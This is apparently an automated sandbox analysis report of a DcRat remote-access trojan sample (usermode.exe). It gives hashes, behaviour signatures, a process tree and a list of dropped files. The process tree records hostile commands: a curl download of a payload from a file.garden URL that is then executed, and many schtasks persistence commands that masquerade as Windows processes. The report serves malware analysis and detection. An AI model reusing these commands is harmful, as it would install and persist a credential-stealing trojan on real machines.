Overview

overview

10

Static

static

3

usermode.exe

windows7-x64

6

usermode.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-12-2024 18:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    usermode.exe

  • Size

    671KB

  • MD5

    0f1700ee21d3f50876ba87ba59b5362c

  • SHA1

    0204c433d0529811f23b71582da12e4276b3439f

  • SHA256

    92c13c55b6e2afc22881d1bd9cbea837d7f2dbc3e1c17c194608f2f86d0cc597

  • SHA512

    6ac8306aebf8161019df51b26078f3c993aeda3ecb9d4510e67fe788555d91a8453943136568bc643643b9fdea2983771fe35eecff47cafcc577aec789ef1f89

  • SSDEEP

    12288:RZco5avwoS8/jtVoMpaSU5WflFr5//EmnBPG2pptCA:WFS8/eS4WflFr5//EmnVrbt

Score
10/10
dcratdefense_evasiondiscoveryinfostealerrat

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\usermode.exe
    "C:\Users\Admin\AppData\Local\Temp\usermode.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4604
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\system32\curl.exe
        curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
        3⤵
        • Drops file in Windows directory
        PID:4340
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        2⤵
          PID:1476
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c cls
          2⤵
            PID:3464
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1144
            • C:\Windows\Speech\client.exe
              C:\Windows\Speech\client.exe
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:744
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe"
                4⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:812
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat" "
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4192
                  • C:\ComponentCrt\chainreviewwinrefSvc.exe
                    "C:\ComponentCrt/chainreviewwinrefSvc.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4404
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oz9uVg0Ilv.bat"
                      7⤵
                      • Suspicious use of WriteProcessMemory
                      PID:448
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        8⤵
                          PID:4564
                        • C:\Windows\system32\PING.EXE
                          ping -n 10 localhost
                          8⤵
                          • System Network Configuration Discovery: Internet Connection Discovery
                          • Runs ping.exe
                          PID:964
                        • C:\ComponentCrt\smss.exe
                          "C:\ComponentCrt\smss.exe"
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3204
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe
              2⤵
                PID:4968
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\ComponentCrt\smss.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2888
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\ComponentCrt\smss.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2320
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\ComponentCrt\smss.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:3724
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\ComponentCrt\WmiPrvSE.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:1184
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\ComponentCrt\WmiPrvSE.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:1636
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\ComponentCrt\WmiPrvSE.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:912
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2248
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:5032
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2540
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\ComponentCrt\conhost.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2836
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ComponentCrt\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:4696
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\ComponentCrt\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:4288
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:4996
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:4152
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:3940
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 12 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2436
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:5092
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 10 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:3680

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat
              Filesize

              98B

              MD5

              4dafd9e9509ac96be6aa5baec659da4d

              SHA1

              a091552663ddea89536560f232b8339f318c9cbc

              SHA256

              0c53b640295abd25e8387957941e29f5c4e765376365409164ac39e3365a6ccf

              SHA512

              d290c162347e236e0e197c52afc4f4b33f1eba2498dfe2ad86c414c87ab70c9fbbd2132cd08bfb4137e8555a095ca9acb6675727a4a5f65ccc46141c16698132

              Download Submit

            • C:\ComponentCrt\chainreviewwinrefSvc.exe
              Filesize

              1.8MB

              MD5

              11cca9e2c6dc9c2a728b89e7314ec26a

              SHA1

              58aec3b662a1c4e8b43cc454d90813ac89b5e612

              SHA256

              300072795259e7b2baa69a7a3d19ffea1844dffc391e710c654aa1b66b0e2197

              SHA512

              fb1fcff1c94e73b1227f65b237639e25604d614cfe365f2108bbbfdb489b97410fdc17411b8f00fc5b8f57d51080b4496010537a6a4ff9b15b7bdd24f89d0df7

              Download Submit

            • C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe
              Filesize

              207B

              MD5

              b292d233456b16f26abc1aa07c9f5de0

              SHA1

              7b025705136101b5618d81d8ebf472335eebde43

              SHA256

              e75d13d4b079fafbd413fa8182c270f1f0f41b1b19b3469db12de226fed67b2d

              SHA512

              1c9c3846ab0e392dc6833de2a9238c91b6042b5095521196a3ceae8830edf7fb6d73118ed023b2e2daf287a48084fa8ee40241248a231cf668d5cc5e8f947ee4

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\oz9uVg0Ilv.bat
              Filesize

              152B

              MD5

              d0dd581981dd5efdad4ce5733b79b3dd

              SHA1

              ca3cccda01d3891991232e855af3fd7e7723a641

              SHA256

              a6bc1f45f45a4d6a553c5bfb064b2ab895ae73bb944ecbe3b7cfbbcb6650cc05

              SHA512

              cad0f05ff708e64b2648e7c332b27d4a158cb3c1d4264ec6f43553265928769da480d1c37d58009c29f3e4a8770fccbae08da776fe30d7baf67e06637159bf15

              Download Submit

            • C:\Windows\Speech\client.exe
              Filesize

              2.1MB

              MD5

              bf4f13d82d217ed69d80124c50d9441c

              SHA1

              b7ee7d109f61371342e924e6a0c3505347dd318f

              SHA256

              51890bfc6f223014ff16f4bfa6ace8e2d2ec3c81eb6965406813b9ca32b08508

              SHA512

              1ba17e55d6d1f6fda99daffe3f11f995d5e8434901b2aea9105728ccbff1b81727d96bf8811a62e8367fca0ec23bdea331165b001088b183281164269668d2f4

              Download Submit

            • memory/3204-50-0x000000001CB50000-0x000000001CC52000-memory.dmp

              Filesize

              1.0MB

              Download

            • memory/4404-16-0x00000000004C0000-0x000000000069A000-memory.dmp

              Filesize

              1.9MB

              Download

            • memory/4404-18-0x0000000002860000-0x000000000286E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/4404-23-0x000000001B310000-0x000000001B328000-memory.dmp

              Filesize

              96KB

              Download

            • memory/4404-21-0x000000001B670000-0x000000001B6C0000-memory.dmp

              Filesize

              320KB

              Download

            • memory/4404-20-0x000000001B2F0000-0x000000001B30C000-memory.dmp

              Filesize

              112KB

              Download

            • memory/4404-25-0x0000000002870000-0x000000000287C000-memory.dmp

              Filesize

              48KB

              Download